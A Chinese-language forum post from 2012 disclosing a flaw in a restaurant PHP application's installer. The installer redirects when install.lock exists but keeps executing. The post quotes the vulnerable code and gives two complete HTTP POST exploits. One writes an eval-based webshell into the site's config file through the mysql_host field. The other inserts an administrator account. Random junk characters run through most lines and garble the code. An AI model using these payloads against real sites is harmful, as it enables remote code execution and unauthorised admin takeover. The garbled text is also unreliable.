问题出在/install/index.php文件。在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。
- y% z$ |' r( g+ g+ E+ ^% Q" k
8 b! b7 O# v" |. L2 u# i8 `# R<?php
8 ?5 t- W2 c |# b0 V* ]6 Dif(file_exists("../install.lock")) T8 t& H# r7 S$ z% X+ j! Q. ]
{" M( B- c1 f T; C' ^2 I
header("Location: ../");//没有退出: G) B, ^* f! d3 A) z. O0 @
} U1 z* |" U# O7 w' b, C7 `- E. V
* Q5 ]; a4 ^& H/ p//echo 'tst';exit;* @' T$ u/ p- i3 K; \0 z* H
require_once("init.php");2 u/ M& ~8 ?% C' I
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
9 L/ _0 \6 w( M% p{. y7 D( Y# J# R. _5 k! w
可见在/install/index.php存在时,只是header做了302重定向并没有退出,也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。4 i( a: s6 f6 d/ }# M8 s" P6 y
" g. f! N% o1 q& S4 q1、getshell(很危险)7 j' O: H; q: b7 K9 {& X
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
$ B* i5 [& m/ B8 [, ?{$ M' f# H# O; z3 ]% Q" ]
$smarty->assign("step",1);
8 ]6 i0 m7 T# {* h5 t4 j. B$smarty->display("index.html");
6 H4 _0 L- M6 Z n) D4 `! D}elseif($_REQUEST['step']==2)
; V4 Z' v& q1 C1 ?8 o0 C0 X{
+ Z/ r: {3 C2 j+ f3 c $mysql_host=trim($_POST['mysql_host']);
2 B, S8 A" d! R* L; q $mysql_user=trim($_POST['mysql_user']);) E4 c E, Q4 h/ z
$mysql_pwd=trim($_POST['mysql_pwd']);
$ G- ^0 O) B; r $mysql_db=trim($_POST['mysql_db']);
/ z6 @- Q1 O, z! @* v$ i) V $tblpre=trim($_POST['tblpre']);
( E; P& H% ?2 S( B $domain==trim($_POST['domain']);
! B3 W: P7 d0 l ]' s $str="<?php \r\n";
" R8 I" W! {* ]5 y6 _ $str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";; ]/ x' L& W: R; z! |; H
$str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";! B( ?" v& ]( y% ?
$str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";
+ i7 k# s4 H+ }6 d9 A' _2 n( E $str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";4 h9 n0 H! v( l+ I0 ^9 P0 O8 T
$str.='define("MYSQL_CHARSET","GBK");'."\r\n";# I" j" M' h& g: E
$str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";
! s/ y( A) \. {" Y, ?7 v $str.='define("DOMAIN","'.$domain.'");'."\r\n";6 f7 Q7 p. X5 j4 B0 j
$str.='define("SKINS","default");'."\r\n";
4 n, L+ R0 c6 t5 O+ T' m7 a! ^: _ $str.='?>';; B3 o" f8 A* N; ?8 B% c6 {1 F
file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件, F6 L9 j8 U4 v/ t
上面的代码将POST的数据直接写入了../config/config.inc.php文件,那么我们提交如下POST包,即可获得一句话木马4 |% d/ [3 Z5 L, ~. f7 B& {' ?2 [6 f
POST /canting/install/index.php?m=index&step=2 HTTP/1.1
* H: q; I% ~. Z; s& IHost: 192.168.80.129
# {3 Y' C3 y( _" i! b3 R& vUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
5 B: k4 Z. F. p$ O; e# f/ ]4 LAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
/ u9 k% }2 S7 m7 BAccept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
5 f+ A [ E! @* f; G& `% vAccept-Encoding: gzip, deflate# C L2 O, T4 T# i! J: c
Referer: http://192.168.80.129/canting/install/index.php?step=1/ W& [9 F, ^; x" }8 a, n0 I. `
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42) j* [! o' ?; O3 ]) N- G$ @" j1 D
Content-Type: application/x-www-form-urlencoded4 O$ d7 u F/ u& N+ Z
Content-Length: 126- q& z9 y' ^& @/ d$ Y$ f- F7 {
% y+ @& G# |; h: E. ?1 Mmysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD
( h& V7 m5 ]2 _; {但是这个方法很危险,将导致网站无法运行。0 |2 U7 U5 |) Q, Q+ g' n
1 ~+ n, E* r1 \. I: h
2、直接添加管理员
, ]& I4 {- N, ]* g. R6 f- C3 \
/ {0 e, V2 L1 v: q+ Z( Kelseif($_REQUEST['step']==5)
) p+ x6 D& V" U' A) o{
* Q6 M4 _+ N, U* @; c) [$ ^! w, Z if($_POST)
- U! |9 G; w0 M { require_once("../config/config.inc.php");! x; F( u; O# N4 B
$link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);) t1 w0 m. R1 l4 D% z h
mysql_select_db(MYSQL_DB,$link);
( N7 u. J' W" o( J# Z; v0 P mysql_query("SET NAMES ".MYSQL_CHARSET );
9 O9 ~4 V' _$ A2 ` mysql_query("SET sql_mode=''");
r6 [& o2 x8 j
# d: C1 g( B3 ~6 f $adminname=trim($_POST['adminname']);
6 t5 e' @ Z7 o3 q$ `; m7 l+ V+ l, s $pwd1=trim($_POST['pwd1']);
/ a- N. @, Y a7 H $pwd2=trim($_POST['pwd2']);% c% F2 M. ~" a# y/ r* s
if(empty($adminname))
, `0 W) l! M2 Z4 V( g m+ z {& I0 R1 |5 B$ t% ?1 l3 h
4 B# i% a* H) e+ U) x. W* Z7 ? echo "<script>alert('管理员不能为空');history.go(-1);</script>";
+ @8 ]. J' B/ a exit();
0 h- i5 c" |8 n; u8 r3 v$ z3 W; W }
; ~$ J2 d& y1 ?/ i- S if(($pwd1!=$pwd2) or empty($pwd1))
$ `1 x2 L( }4 P" Z- l, l; K {! @" D t1 \3 [% t! K
echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//这里也是没有退出( J4 m: P. Z. s. }5 [
}: X- `4 n1 _0 G) y# D4 v8 C
mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员
' U! y' D+ B5 P, ~ }, U( q7 L7 R/ R" u* @
这样的话我们就可以直接插入一个qingshen/qingshen的管理员帐号,语句如下:. \& g% ^6 A s
POST /canting/install/index.php?m=index&step=5 HTTP/1.1
, \4 N8 s+ x/ }# yHost: 192.168.80.129
, K7 s1 ~+ c7 N: X0 f$ z* e$ EUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0) _# [! g5 c) a9 |/ g% k! s: A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
6 c; C' w" _; a" [Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
# e$ ], a% X$ W2 z6 T$ q/ R) BAccept-Encoding: gzip, deflate
I9 o0 X6 a4 I; E' h DReferer: http://www.2cto.com /canting/install/index.php?step=1
" f! @$ g# D, T8 k3 \( N3 }Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
5 K4 {) ?8 g2 m( a$ qContent-Type: application/x-www-form-urlencoded
1 q5 ]% T- n3 N7 c, B+ H6 o+ LContent-Length: 46
( D( o* c( @" J 1 _9 m8 A' c. b. K3 N; c
adminname=qingshen&pwd1=qingshen&pwd2=qingshen D9 t3 _- h7 ], m0 E& p3 }
|
发表于 2012-12-4 11:13:44
收藏
支持
反对